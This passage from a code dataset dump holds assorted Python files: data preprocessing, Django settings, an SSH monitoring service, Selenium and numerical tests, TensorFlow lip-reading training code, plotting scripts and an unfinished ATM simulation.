= pd.DataFrame(columns=['station','utc_time','latitude',\n 'longitude','temp','pres','dewp','wind_speed', 'wind_direction',\n 'pm25_1','pm25_2','pm25_3', 'pm25_4','pm25_5','pm25_6','pm25_7',\n 'dist_1','dist_2','dist_3','dist_4','dist_5','dist_6','dist_7',\n 'pm25'])\n\nwith tqdm(total=len(data)) as pbar:\n for i in range(len(data)):#lendata\n current_station = data.iloc[i, 0]\n current_time = data.iloc[i, 1]\n current_lon, current_lat = coord_aq_stations[coord_aq_stations['station'] == current_station].iloc[0, 1:3]\n temp = data.iloc[i, 2]\n pres = data.iloc[i, 3]\n dewp = data.iloc[i, 4]\n wind_speed = data.iloc[i, 5]\n wind_direction = data.iloc[i, 6]\n current_pm25 = data.iloc[i, -1]\n\n row = {'station': current_station, 'utc_time': current_time, 'latitude': current_lat, 'longitude': current_lon,\n 'temp': temp, 'pres': pres, 'dewp': dewp, 'wind_speed': wind_speed, 'wind_direction': wind_direction}\n\n # Get PM2.5 of neighbors\n neighbors = dict_neighbors[current_station]\n for k in range(knn):\n station, distance = neighbors['stations'][k], neighbors['distances'][k]\n mask = (data['station'] == station) & (data['utc_time'] == current_time)\n neighbor_pm25 = data.loc[mask].iloc[0, -1]\n row.update({'pm25_'+str(k+1): neighbor_pm25})\n row.update({'dist_'+str(k+1): distance})\n\n row.update({'pm25': current_pm25})\n data_processed = data_processed.append(row, ignore_index=True)\n pbar.update(1)\n\n##\n\ndata_processed.to_csv(home+\"/MasterThesis/data/data2013-2017/data_processed_uci.csv\", index=False)\nprint(\"Data created and saved as 'data_processed_uci.csv'\")\n\n##\n","sub_path":"Preprocessing/preprocessing_2013_2017.py","file_name":"preprocessing_2013_2017.py","file_ext":"py","file_size_in_byte":8700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"184965162","text":"\"\"\"Settings for storage app.\n\nUsed to provide s simple default configuration.\n\"\"\"\nfrom django.conf import settings\n\ndata_dir 
= getattr(settings, \"FLOW_EXECUTOR\", {}).get(\"DATA_DIR\", \"/some_path\")\ndefault_local_connector = \"local\"\ndefault_storage_connectors = {\n default_local_connector: {\n \"connector\": \"resolwe.storage.connectors.localconnector.LocalFilesystemConnector\",\n \"config\": {\"priority\": 0, \"path\": data_dir},\n },\n}\n\nSTORAGE_LOCAL_CONNECTOR = getattr(\n settings, \"STORAGE_LOCAL_CONNECTOR\", default_local_connector\n)\nSTORAGE_CONNECTORS = getattr(settings, \"STORAGE_CONNECTORS\", default_storage_connectors)\n","sub_path":"resolwe/storage/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"382706035","text":"\"\"\"\nThis file is part of Linspector (https://linspector.org/)\nCopyright (c) 2013-2023 Johannes Findeisen . All Rights Reserved.\nSee LICENSE.\n\"\"\"\n\nimport os\nimport pprint\n\nimport paramiko\n\nfrom linspector.service import Service\n\n\ndef create(configuration, environment, log):\n return SSHService(configuration, environment, log)\n\n\nclass SSHService(Service):\n\n def execute(self, **kwargs):\n path = os.path.join(os.environ['HOME'], '.ssh', 'id_rsa')\n key = paramiko.RSAKey.from_private_key_file(path)\n\n client = paramiko.SSHClient()\n client.get_host_keys().add('hanez.org', 'ssh-rsa', key)\n pprint.pprint(client._host_keys)\n\n client.connect('hanez.org', username='hanez')\n\n # self.command.call() ist dann das:\n stdin, stdout, stderr = client.exec_command('ls')\n for line in stdout:\n print('... 
' + line.strip('\\n'))\n client.close()\n","sub_path":"linspector/services/net/ssh.py","file_name":"ssh.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"78144775","text":"import time\r\n\r\ndef test_check_exists_by_css_selector(browser):\r\n\r\n link = f\"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/\"\r\n browser.get(link)\r\n time.sleep(30) \r\n button = len(browser.find_elements_by_css_selector('button.btn.btn-lg.btn-primary')) > 0\r\n\r\n assert button > 0, f\"No element: button\"\r\n\r\n","sub_path":"Step_3/test_items.py","file_name":"test_items.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"283872034","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\nimport pymongo\n\nimport collections\n\nfrom matplotlib import rcParams\nrcParams.update({'figure.autolayout': True})\n\ndef flatten(d, parent_key='', sep='_'):\n \"\"\"\n flatten nested Mongodb records\n \"\"\"\n items = []\n for k, v in d.items():\n new_key = parent_key + sep + k if parent_key else k\n if isinstance(v, collections.MutableMapping):\n items.extend(flatten(v, new_key, sep=sep).items())\n else:\n items.append((new_key, v))\n return dict(items)\n\nclient = pymongo.MongoClient()\ndb = client.lai\nresults = db.results\n\ndf = pd.DataFrame(list(map(flatten, results.find({'batch_size' : 20, 'window_size' : {'$gt' : 2}}))))\nfig, ax = plt.subplots()\n\nax.scatter(df['window_size'], df['overall_acc_avg'], color='red')\nax.set_ylabel('average accuracy\\n(across 20\\ntest chromosomes)', color='red',\n rotation='horizontal', horizontalalignment='right', multialignment='center')\n\nax2 = ax.twinx()\nax2.scatter(df['window_size'], df['time'] / 60, color='blue')\nax2.set_ylabel('runtime\\n(minutes)', color='blue',\n 
rotation='horizontal', horizontalalignment='left', multialignment='center')\n\nax.set_xlabel('window size')\nplt.title('window size vs. accuracy and runtime (using sliding windows)')\nplt.gcf().set_size_inches([9.4, 4.8])\n\nfig.savefig('results/sliding_windows/window_size_vs_accuracy_and_runtime')\n","sub_path":"bin/pythonScripts/plot_results.py","file_name":"plot_results.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"30790565","text":"#!/usr/bin/env python\n\nimport Prediction as Pred\nfrom itertools import chain\nfrom Render import FigureCanvasPixbuf, drawHist, drawBar\nfrom os.path import basename\nfrom operator import itemgetter\nfrom multiprocessing import Process, Manager, Value\nfrom time import time\nfrom math import sqrt\nfrom Bio.Seq import Seq\nfrom Bio.SeqRecord import SeqRecord\n\nclass Model():\n def __init__(self):\n self.tst_inpt = [['','']]\n \n def _pred_part(self, i, partisi, wdw, hist, hmms, al_fst):\n train_seqs_part = []\n for e, train in enumerate(partisi):\n if e == i:\n test_seqs_part = train\n else:\n train_seqs_part += train\n traind_mdl, hmm = Pred.train(train_seqs_part, wdw, al_fst)\n pred_seqs, probs = Pred.predict(traind_mdl, test_seqs_part, wdw, al_fst)\n _, acc = Pred.test(pred_seqs, test_seqs_part)\n hmms.value += hmm\n hist += acc\n \n def _calc_yres(self, hist):\n res = []\n res.append(min(hist))\n res.append(max(hist))\n res.append(sum(hist) / len(hist))\n v = sum((i - res[2])**2 for i in hist) / (len(hist) - 1)\n res.append(sqrt(v))\n \n p = 0\n for i in hist:\n if res[2] - res[3] <= i <= res[2] + res[3]:\n p +=1 \n\n res.append(p / float(len(hist))) \n return res\n \n def _calc_ytot(self, res):\n s = []\n s.append(sum(res[k][0] for k in res))\n s.append(sum(res[k][1] for k in res))\n s.append(min(res[k][2] for k in res))\n s.append(max(res[k][3] for k in res))\n s.append(sum(res[k][4] for k in res) / len(res))\n 
s.append(sqrt(sum(res[k][5] ** 2 for k in res) / len(res)))\n s.append(sum(res[k][6] for k in res) / len(res))\n return s\n \n def _calc_wtot(self, wtot):\n s = []\n for i in range(7):\n s.append(sum(wtot[w][i] for w in wtot) / float(len(wtot)))\n \n return s\n \n def _draw_ytot(self, key, hist, al_fst, wdw, yres):\n hist_all = list(chain.from_iterable([hist[k] for k in hist]))\n al = 'Aligned' if al_fst else 'Unaligned'\n title = '%s (s = %d, %s)' % (key, wdw, al)\n \n return [drawHist(hist_all, title), drawBar(yres, title)]\n \n def _draw_tot(self, wtot, al_fst, key):\n al = 'Aligned' if al_fst else 'Unaligned'\n title = '%s (All Slicing Size, %s)' % (key, al)\n \n return drawBar(wtot, title)\n \n def _create_yres(self, key, manager, fsts, y, al_fst, wdw):\n train_input = Pred.inputTraining(fsts[y], fsts[y+1], al_fst)\n yres = [len(train_input)]\n partisi = Pred.partitioning(train_input) \n p = []\n hist = manager.list([])\n yres.append(Value('i', 0))\n \n for i in range(len(partisi)):\n arg = (i, partisi, wdw, hist, yres[1], al_fst)\n p.append(Process(target=self._pred_part, args=arg))\n p[i].start()\n \n for t in p:\n t.join()\n\n yres[1] = yres[1].value\n yres += self._calc_yres(hist)\n al = 'Aligned' if al_fst else 'Unaligned'\n title = '%s (s = %d, %s)' % (key, wdw, al)\n yres.append(drawHist(hist, title))\n \n return yres, hist\n \n def _create_ytot(self, fsts, yres, hist, al_fst, wdw):\n key = basename(fsts[0])[:-6] + '-' + basename(fsts[-1])[:-6]\n ytot = self._calc_ytot(yres)\n ytot.append(self._draw_ytot(key, hist, al_fst, wdw, yres))\n ytot.append(key)\n \n return ytot\n \n def _create_tot(self, fsts, wtot, al_fst):\n key = basename(fsts[0])[:-6] + '-' + basename(fsts[-1])[:-6]\n tot = self._calc_wtot(wtot)\n tot.append(self._draw_tot(wtot, al_fst, key))\n tot.append(key)\n \n return tot\n \n def inputTraining(self, train_fst, target_fst, win, alf):\n self.wdw = win\n self.al_fst = alf\n self.train_input = Pred.inputTraining(train_fst, target_fst, 
alf)\n \n return len(self.train_input)\n \n def train(self):\n self.traind_mdl, no = Pred.train(self.train_input, self.wdw, self.al_fst)\n \n return no\n \n def predict(self, test_seq):\n self.tst_inpt[0][0] = SeqRecord(Seq(test_seq))\n p = Pred.predict(self.traind_mdl, self.tst_inpt, self.wdw, self.al_fst)\n self.pred_seqs, self.probs = p[0], p[1]\n \n return self.pred_seqs[0], self.probs[0]\n \n def test(self, target_seq):\n self.tst_inpt[0][1] = SeqRecord(Seq(target_seq))\n self.aligned, self.acc = Pred.test(self.pred_seqs, self.tst_inpt)\n \n return self.aligned[0][0], self.aligned[0][1], self.acc[0] \n \n def validate(self, fasta, w, al_fst):\n fsts = sorted(fasta)\n wres, wtot, tot = {}, {}, []\n manager = Manager()\n \n for wdw in w:\n yres, ytot, hist = {}, [], {}\n \n for y in range(len(fsts[:-1])):\n key = basename(fsts[y])[:-6] + '-' + basename(fsts[y+1])[:-6]\n yres[key], hist[key] = self._create_yres(key, manager, fsts, y, al_fst, wdw)\n \n if len(hist) > 1:\n ytot = self._create_ytot(fsts, yres, hist, al_fst, wdw)\n \n wres[wdw], wtot[wdw] = yres, ytot\n \n if len(w) > 1:\n tot = self._create_tot(fsts, wtot, al_fst)\n \n return wres, wtot, tot\n\n def get_pred_seq(self):\n return self.pred_seqs[0]","sub_path":"src/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":5532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"253626358","text":"# BACKJOON #2851 <슈퍼 마리오>\n# https://www.acmicpc.net/problem/2851\n\narr = [int(input()) for i in range(10)]\nscore = 0\nfor n in arr:\n\ttemp = score + n\n\tif temp >= 100:\n\t\tif temp-100 > 100-score:\n\t\t\tprint(score)\n\t\telse: print(temp)\n\t\texit()\n\telse: score = temp\nprint(score)\n","sub_path":"Baekjoon/2851_SuperMario.py","file_name":"2851_SuperMario.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"69366337","text":"# 
encoding=utf-8\nimport sys\nfrom hyper_and_conf import hyper_param as hyperParam\nfrom hyper_and_conf import hyper_train, hyper_optimizer\nimport core_lip_main\nimport core_data_SRCandTGT\nfrom core_resnet import identity_block, conv_block\nfrom tensorflow.python.client import device_lib\n# from tensorflow.python.keras import initializers\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow.python.keras import regularizers\nimport core_Transformer_model\nL2_WEIGHT_DECAY = 1e-4\nBATCH_NORM_DECAY = 0.9\nBATCH_NORM_EPSILON = 1e-5\nDATA_PATH = sys.path[0]\nSYS_PATH = sys.path[1]\n# TRAIN_PATH = '/home/vivalavida/massive_data/lip_reading_data/sentence_level_lrs2'\n# C = '/home/vivalavida/massive_data/lip_reading_data/sentence_level_lrs2/main'\nsrc_data_path = [DATA_PATH + \"/corpus/lip_corpus.txt\"]\n\ntgt_data_path = [DATA_PATH + \"/corpus/lip_corpus.txt\"]\n# TFRECORD = '/home/vivalavida/massive_data/lip_reading_TFRecord/tfrecord_word'\n# TFRECORD = '/home/vivalavida/massive_data/sentence_lip_data_tfrecord_train_v1'\nTFRECORD = '/home/vivalavida/massive_data/'\n# TFRECORD = '/home/wonderwall/data'\n\n# TFRECORD = '/home/vivalavida/massive_data/fc1'\n\n# TFRECORD = '/data'\n\n# TFRECORD = '/Users/barid/Documents/workspace/batch_data/'\n\n# PADDED_IMG = 150\n# PADDED_TEXT = 80\nPADDED_IMG = 50\nPADDED_TEXT = 1\n\n\ndef get_vgg(self):\n if tf.io.gfile.exists('pre_train/vgg16_pre_all'):\n vgg16 = tf.keras.models.load_model('pre_train/vgg16_pre_all')\n else:\n vgg16 = tf.keras.applications.vgg16.VGG16(\n include_top=True, weights='imagenet')\n return vgg16\n\n\ndef get_available_cpus():\n local_device_protos = device_lib.list_local_devices()\n return len([x.name for x in local_device_protos if x.device_type == 'CPU'])\n\n\ndef get_available_gpus():\n local_device_protos = device_lib.list_local_devices()\n return len([x.name for x in local_device_protos if x.device_type == 'GPU'])\n\n\ndef cpus_device():\n local_device_protos = device_lib.list_local_devices()\n 
return [x.name for x in local_device_protos if x.device_type == 'CPU']\n\n\ndef gpus_device():\n local_device_protos = device_lib.list_local_devices()\n return [x.name for x in local_device_protos if x.device_type == 'GPU']\n\n\ngpu = get_available_gpus()\nTRAIN_MODE = 'large' if gpu > 0 else 'test'\nhp = hyperParam.HyperParam(TRAIN_MODE, gpu=get_available_gpus())\nPAD_ID_int64 = tf.cast(hp.PAD_ID, tf.int64)\nPAD_ID_float32 = tf.cast(hp.PAD_ID, tf.float32)\n\ndata_manager = core_data_SRCandTGT.DatasetManager(\n src_data_path,\n tgt_data_path,\n batch_size=hp.batch_size,\n PAD_ID=hp.PAD_ID,\n EOS_ID=hp.EOS_ID,\n # shuffle=hp.data_shuffle,\n shuffle=hp.data_shuffle,\n max_length=hp.max_sequence_length,\n tfrecord_path=TFRECORD)\n\n# train_dataset, val_dataset, test_dataset = data_manager.prepare_data()\n\n\ndef get_hp():\n return hp\n\n\ndef backend_config():\n config = tf.compat.v1.ConfigProto()\n # config.graph_options.optimizer_options.global_jit_level = tf.OptimizerOptions.ON_1\n config.intra_op_parallelism_threads = 4\n config.inter_op_parallelism_threads = 4\n # # Don't pre-allocate memory; allocate as-needed\n config.gpu_options.allow_growth = True\n\n # Only allow a total of half the GPU memory to be allocated\n # config.gpu_options.per_process_gpu_memory_fraction = 0.999\n # config.allow_soft_placement = True\n\n return config\n\n\ndef input_fn(flag=\"TRAIN\"):\n if flag == \"VAL\":\n dataset = data_manager.get_raw_val_dataset()\n else:\n if flag == \"TEST\":\n dataset = data_manager.get_raw_test_dataset()\n else:\n if flag == \"TRAIN\":\n dataset = data_manager.get_raw_train_dataset()\n else:\n assert (\"data error\")\n return dataset\n\n\ndef map_data_for_feed_pertunated(x, y):\n return ((x, randomly_pertunate_input(y)), y)\n\n\ndef map_data_for_feed(x, y):\n return ((x, y), y)\n\n\ndef map_data_for_text(x):\n return ((x, x), x)\n\n\ndef randomly_pertunate_input(x):\n determinater = np.random.randint(10)\n if determinater > 3:\n return x\n else:\n index = 
np.random.randint(2, size=(1, 80))\n x = x * index\n return x\n\n\ndef pad_sample(dataset, batch_size):\n # dataset = dataset.shuffle(200000, reshuffle_each_iteration=True)\n dataset = dataset.padded_batch(\n hp.batch_size,\n (\n [PADDED_IMG, 32, 64, 3], # source vectors of unknown size\n [PADDED_TEXT]), # target vectors of unknown size\n drop_remainder=True)\n\n return dataset\n\n\ndef pad_text_sample(dataset, batch_size):\n # dataset = dataset.shuffle(200000, reshuffle_each_iteration=True)\n dataset = dataset.padded_batch(\n hp.batch_size,\n [120], # target vectors of unknown size\n drop_remainder=True)\n\n return dataset\n\n\ndef reshape_data(src, tgt):\n # return tf.reshape(src, [-1, 32, 64, 3]), tgt\n return tf.reshape(src, [-1, 32, 64, 3]) / 127.5 - 1.0, tgt\n\n\ndef map_data_for_val(src, tgt):\n return src, tgt\n\n\ndef train_Transformer_input():\n dataset = data_manager.get_text_train_dataset()\n # dataset = dataset.shuffle(100000)\n dataset = pad_text_sample(dataset, batch_size=hp.batch_size)\n\n dataset = dataset.map(map_data_for_text)\n dataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)\n return dataset\n\n\ndef train_input(seq2seq=True, pertunate=False):\n\n dataset = input_fn('TRAIN')\n # dataset = dataset.shuffle(100000)\n dataset = dataset.map(reshape_data)\n dataset = pad_sample(dataset, batch_size=hp.batch_size)\n\n if pertunate:\n dataset = dataset.map(map_data_for_feed_pertunated)\n else:\n dataset = dataset.map(map_data_for_feed)\n dataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)\n return dataset\n\n\ndef test_input(seq2seq=True, pertunate=False):\n\n dataset = input_fn('TRAIN')\n # dataset = dataset.shuffle(100000)\n dataset = dataset.map(reshape_data)\n dataset = dataset.batch(1)\n dataset = dataset.map(map_data_for_val)\n dataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)\n return dataset\n\n\ndef val_input(seq2seq=True):\n dataset = input_fn(\"TRAIN\")\n dataset = dataset.map(reshape_data)\n dataset = 
pad_sample(dataset, 4)\n # dataset = dataset.map(map_data_for_val)\n dataset = dataset.map(map_data_for_val)\n dataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)\n return dataset\n\n\ndef get_external_loss():\n return hyper_train.Onehot_CrossEntropy(hp.vocabulary_size, smoothing=0.1)\n\n\ndef get_image_processor():\n # with tf.device(\"/cpu:0\"):\n if tf.io.gfile.exists('pre_train/res50_pre_all'):\n res = tf.keras.models.load_model('pre_train/res50_pre_all')\n else:\n res = tf.keras.applications.resnet50.ResNet50(\n include_top=False, weights=None, input_shape=[32, 64, 3])\n # pooling='avg',\n # classes=10000)\n res.save('pre_train/res50_pre_all')\n return res\n\n\ndef model_structure(training=True, batch=0, mode='LIP'):\n if batch != 0:\n batch_size = batch\n else:\n batch_size = hp.batch_size\n img_input = tf.keras.layers.Input(\n shape=[PADDED_IMG, 32, 64, 3], dtype=tf.float32, name='Raw_input')\n if mode != 'LIP':\n img_input = tf.keras.layers.Input(\n shape=[None], dtype=tf.int64, name='src_text')\n if training:\n tgt = tf.keras.layers.Input(\n shape=[None], dtype=tf.int64, name='target_text')\n daedalus = core_lip_main.Daedalus(\n hp.max_sequence_length, hp.vocabulary_size, hp.embedding_size,\n hp.batch_size, hp.num_units, hp.num_heads, hp.num_encoder_layers,\n hp.num_decoder_layers, hp.dropout, hp.EOS_ID, hp.PAD_ID,\n hp.MASK_ID)\n # res_out = tf.reshape(res_out, [-1, 200, 4 * 4 * 512])\n logits = daedalus([img_input, tgt], training=training, mode=mode)\n logits = hyper_train.MetricLayer(hp.vocabulary_size)([logits, tgt])\n logits = hyper_train.CrossEntropy_layer(hp.vocabulary_size,\n 0.1)([logits, tgt])\n logits = tf.keras.layers.Lambda(lambda x: x, name=\"logits\")(logits)\n\n model = tf.keras.Model(inputs=[img_input, tgt], outputs=logits)\n else:\n daedalus = core_lip_main.Daedalus(\n hp.max_sequence_length, hp.vocabulary_size, hp.embedding_size,\n batch_size, hp.num_units, hp.num_heads, hp.num_encoder_layers,\n hp.num_decoder_layers, hp.dropout, 
hp.EOS_ID, hp.PAD_ID,\n hp.MASK_ID)\n metric = hyper_train.MetricLayer(hp.vocabulary_size)\n loss = hyper_train.CrossEntropy(hp.vocabulary_size, 0.1)\n ret = daedalus([img_input], training=training)\n outputs, scores = ret[\"outputs\"], ret[\"scores\"]\n model = tf.keras.Model(img_input, outputs)\n return model\n\n\ndef text_model_structure(training=True, batch=0):\n if batch != 0:\n batch_size = batch\n else:\n batch_size = hp.batch_size\n src = tf.keras.layers.Input(shape=[None], dtype=tf.int64, name='src_text')\n if training:\n tgt = tf.keras.layers.Input(\n shape=[None], dtype=tf.int64, name='target_text')\n daedalus = core_Transformer_model.Transformer(\n hp.max_sequence_length,\n hp.vocabulary_size,\n hp.embedding_size,\n hp.batch_size,\n hp.num_units,\n hp.num_heads,\n hp.num_encoder_layers,\n hp.num_decoder_layers,\n hp.dropout,\n hp.EOS_ID,\n hp.PAD_ID,\n )\n # res_out = tf.reshape(res_out, [-1, 200, 4 * 4 * 512])\n logits = daedalus([src, tgt], training=training)\n logits = hyper_train.MetricLayer(hp.vocabulary_size)([logits, tgt])\n logits = hyper_train.CrossEntropy_layer(hp.vocabulary_size,\n 0.1)([logits, tgt])\n logits = tf.keras.layers.Lambda(lambda x: x, name=\"logits\")(logits)\n\n model = tf.keras.Model(inputs=[src, tgt], outputs=logits)\n # else:\n # daedalus = core_lip_main.Daedalus(\n # hp.max_sequence_length, hp.vocabulary_size, hp.embedding_size,\n # batch_size, hp.num_units, hp.num_heads, hp.num_encoder_layers,\n # hp.num_decoder_layers, hp.dropout, hp.EOS_ID, hp.PAD_ID,\n # hp.MASK_ID)\n # metric = hyper_train.MetricLayer(hp.vocabulary_size)\n # loss = hyper_train.CrossEntropy(hp.vocabulary_size, 0.1)\n # ret = daedalus([img_input], training=training)\n # outputs, scores = ret[\"outputs\"], ret[\"scores\"]\n # model = tf.keras.Model(img_input, outputs)\n return model\n\n\ndef train_model():\n return model_structure(training=True)\n\n\ndef test_model(batch=1):\n return model_structure(training=False, batch=1)\n\n\ndef get_optimizer():\n 
return tf.keras.optimizers.Adam(beta_1=0.1, beta_2=0.98, epsilon=1.0e-9)\n # return hyper_optimizer.LazyAdam(beta_1=0.1, beta_2=0.98, epsilon=1.0e-9)\n\n\ndef get_callbacks():\n lr_fn = hyper_optimizer.LearningRateFn(hp.lr, hp.num_units,\n hp.learning_warmup)\n LRschedule = hyper_optimizer.LearningRateScheduler(lr_fn, 0)\n TFboard = tf.keras.callbacks.TensorBoard(\n log_dir=hp.model_summary_dir,\n write_grads=True,\n histogram_freq=100,\n write_images=True,\n update_freq=100)\n TFchechpoint = tf.keras.callbacks.ModelCheckpoint(\n hp.model_checkpoint_dir + '/model.{epoch:02d}.ckpt',\n save_weights_only=True,\n verbose=1)\n NaNchecker = tf.keras.callbacks.TerminateOnNaN()\n ForceLrReduce = tf.keras.callbacks.ReduceLROnPlateau(\n monitor='accuracy', factor=0.2, patience=1, mode='max', min_lr=0.00001)\n return [LRschedule, TFboard, TFchechpoint, NaNchecker, ForceLrReduce]\n","sub_path":"core_model_initializer.py","file_name":"core_model_initializer.py","file_ext":"py","file_size_in_byte":11783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"43712397","text":"import sys\nsys.path.insert(0,'../examples/')\nfrom lorenz63 import *\nfrom numpy import *\nfrom scipy.interpolate import *\ndef plot_clvs():\n fig, ax = subplots(1,2)\n s = [0.7,0.3]\n eps = 1.e-2\n d = 2\n u0 = random.rand(d,1)\n n = 10000\n u = step(u0,s,n) #shape: (n+1)xdx1\n u = u[1:].T[0] # shape:dxn\n du = dstep(u,s) #shape:nxdxd\n P = clvs(u,du,d).T #shape:nxdxd\n v1 = P[0]\n v2 = P[1]\n ax[0].plot([u[0] - eps*v1[0], u[0] + eps*v1[0]],\\\n [u[1] - eps*v1[1], u[1] + eps*v1[1]],\\\n lw=2.0, color='red')\n ax[1].plot([u[0] - eps*v2[0], u[0] + eps*v2[0]],\\\n [u[1] - eps*v2[1], u[1] + eps*v2[1]],\\\n lw=2.0, color='black')\n\n ax[0].set_title('$V^1$',fontsize=24)\n \n ax[1].set_title('$V^2$',fontsize=24)\n for j in range(2):\n ax[j].xaxis.set_tick_params(labelsize=24)\n ax[j].yaxis.set_tick_params(labelsize=24)\n\n\n return fig,ax\n\ndef test_dstep():\n n 
= 100\n u = rand(n,3)\n s = rand(3)\n du_ana = dstep(u, s).T\n eps = 1.e-7\n du_x = (step(u + eps*reshape([1.,0.,0.],[1,3]),s,1) - \\\n step(u - eps*reshape([1.,0.,0.],[1,3]),s,1))/\\\n (2*eps)\n du_y = (step(u + eps*reshape([0.,1.,0.],[1,3]),s,1) - \\\n step(u - eps*reshape([0.,1.,0.],[1,3]),s,1))/\\\n (2*eps)\n\n du_z = (step(u + eps*reshape([0.,0.,1.],[1,3]),s,1) - \\\n step(u - eps*reshape([0.,0.,1.],[1,3]),s,1))/\\\n (2*eps)\n du_fd_x = du_x[-1]\n du_fd_y = du_y[-1]\n du_fd_z = du_z[-1]\n\n assert(allclose(du_fd_x, du_ana[0]))\n assert(allclose(du_fd_y, du_ana[1]))\n assert(allclose(du_fd_z, du_ana[2]))\n\n\ndef test_d2step():\n n = 100\n u = rand(n,3)\n \n s = rand(3)\n d2_ana = d2step(u, s)\n\n eps = 1.e-10\n d2_x = (dstep(u + eps*reshape([1.,0.,0.],[1,3]), s) -\\\n dstep(u - eps*reshape([1.,0.,0.],[1,3]), s))/\\\n (2*eps)\n d2_y = (dstep(u + eps*reshape([0.,1.,0.],[1,3]), s) -\\\n dstep(u - eps*reshape([0.,1.,0.],[1,3]), s))/\\\n (2*eps)\n d2_z = (dstep(u + eps*reshape([0.,0.,1.],[1,3]), s) -\\\n dstep(u - eps*reshape([0.,0.,1.],[1,3]), s))/\\\n (2*eps)\n \n assert(allclose(d2_x, d2_ana[:,0])) \n assert(allclose(d2_y, d2_ana[:,1])) \n assert(allclose(d2_z, d2_ana[:,2])) \n","sub_path":"tests/test_lorenz63.py","file_name":"test_lorenz63.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"414749304","text":"\n\nfrom xai.brain.wordbase.verbs._smile import _SMILE\n\n#calss header\nclass _SMILES(_SMILE, ):\n\tdef __init__(self,): \n\t\t_SMILE.__init__(self)\n\t\tself.name = \"SMILES\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"smile\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_smiles.py","file_name":"_smiles.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"145005211","text":"# Run_convert_CSV_to_JSON.py\n\n\"\"\"convert the CSV file of 
crunchbase into JSON\"\"\"\n\nimport csv # read the CSV file\nimport json # dump the data from CSV (CSVReader variable) into organizations.json\n\n\"\"\"creating a list of CSVFile rows\"\"\"\ndata = list()\nwith open('data/02-crunchbase/organizations.csv') as csvFile:\n csvReader = csv.DictReader(csvFile)\n for rows in csvReader:\n data.append(rows)\n\"\"\"dumping the rows into list of dictionary in json format\"\"\"\nwith open('data/02-crunchbase/organizations.json', 'w') as jsonFile:\n json.dump(data, jsonFile, indent=1)\n","sub_path":"Run_convert_CSV_to_JSON.py","file_name":"Run_convert_CSV_to_JSON.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"515464539","text":"import random\r\nimport datetime\r\nfrom customer import Customer\r\n# Instance the class from customer.py\r\natm = Customer(id) # id -> python built-in function to return an identity of an object\r\n\r\nwhile True:\r\n pin = int(input('Enter Your PIN: '))\r\n \r\n # Verifikasi Pin\r\n tries_chance = 0\r\n while pin != atm.checkPin() and tries_chance < 3:\r\n pin = int(input('Wrong PIN, Enter Again: '))\r\n tries_chance += 1\r\n\r\n if tries_chance == 3:\r\n print('Error, please re-insert Your ATM card...')\r\n # Exit the program\r\n exit()\r\n \r\n # Menu ATM\r\n while True:\r\n print('\\nWelcome to ATM')\r\n \r\n print('\\n1 - Check Balance\\t2 - Withdraw\\t3 - Deposit\\t4 - Change Pin\\t5 - Exit')\r\n select_menu = int(input('\\nChoose Menu: '))\r\n \r\n # Cek Saldo\r\n if select_menu == 1:\r\n print(f'Your Balance is: IDR {atm.checkBalance()}\\n')\r\n # Ambil Uang\r\n elif select_menu == 2:\r\n nominal = int(input('Enter your withdraw nominal: '))\r\n verify_withdraw = input(f'It is correct nominal? 
(y/n) IDR {nominal}: ')\r\n if verify_withdraw == 'y':\r\n print(f'Initial Balance is IDR {atm.checkBalance()}')\r\n if atm.checkBalance() - nominal < 10000:\r\n print('Sorry, Your Balance cant lower than IDR 10000')\r\n elif nominal < atm.checkBalance():\r\n atm.withdrawBalance(nominal)\r\n print('Transaction Success')\r\n print(f'Current Balance is IDR {atm.checkBalance()}')\r\n else:\r\n print('Sorry, Your Balance is not enough')\r\n else:\r\n break\r\n # Simpan Uang\r\n elif select_menu == 3:\r\n nominal = int(input('Enter your deposit nominal: '))\r\n verify_deposit = input(f'It is correct nominal? (y/n) IDR {nominal}: ')\r\n if verify_deposit == 'y':\r\n atm.depositBalance(nominal)\r\n print(f'Current Balance is IDR {atm.checkBalance()}')\r\n else:\r\n break\r\n # Ganti Pin\r\n elif select_menu == 4:\r\n current_pin = int(input('Enter Your current PIN: '))\r\n if current_pin != atm.checkPin():\r\n print('Wrong PIN!')\r\n break\r\n \r\n new_pin = int(input('Enter Your new PIN: '))\r\n verify_new_pin = int(input('Enter Your new PIN again: '))\r\n if verify_new_pin == new_pin:\r\n # Ubah PIN awal ke PIN baru\r\n atm.pin = new_pin\r\n print('Success')\r\n else:\r\n print('Failed, Your new PIN is not match')\r\n # Cetak Receipt dan exit\r\n elif select_menu == 5:\r\n 